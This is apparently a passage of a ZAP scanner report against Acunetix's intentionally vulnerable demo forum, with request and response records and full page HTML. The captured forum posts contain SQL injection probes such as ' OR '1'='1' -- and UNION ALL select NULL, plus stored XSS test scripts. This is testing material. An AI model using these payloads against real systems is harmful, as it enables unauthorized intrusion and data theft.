<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmSearch" method="get" action=""> |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- 